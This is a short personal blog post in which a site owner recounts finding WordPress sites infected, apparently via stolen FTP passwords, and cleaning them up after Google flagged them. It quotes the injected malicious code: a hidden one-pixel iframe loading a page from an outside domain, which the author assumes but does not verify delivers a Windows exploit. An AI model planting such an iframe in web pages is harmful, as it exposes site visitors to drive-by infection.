Something new and completely unexpected happened to me last sunday night around 8pm (what totally fucked up the end of my weekend).
First I was alerted by Google Webmaster Tools (GWT) that my websites were not in good health, just as it’s shown in this screenshot I found on Google images:
By looking what was wrong on my websites, I found this on the index.php of WordPress:
You can see the malicious iframe here:
<iframe src=http://almacostruzioni.eu/stata2.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME>
I did not try to debug what can be found at this URL, but this is surely some kind of script which profits of a Windows exploit and install the virus on your computer. So how do I know it has sniffed by FTP passwords? Because some of my websites were contamined also, especially those that were setup in my FTP client on the infected computer.
By finding this iframe on my website, Google flaged it as potentially dangerous for users. A warning message was appearing to anyone browsing with Google Chrome and connecting on my URLs.
What was really a lot less funny is that some Facebook pages were hosted on my server. Google flaged them also as being dangerous for users, that was really annoying for my clients. I had to reinstall a clean WordPress by night. Once this was done, I asked Google Webmaster Tools to reinspect my website and after around 24 hours, every warning messages were gone.
Hope it can helps someone in the same situation.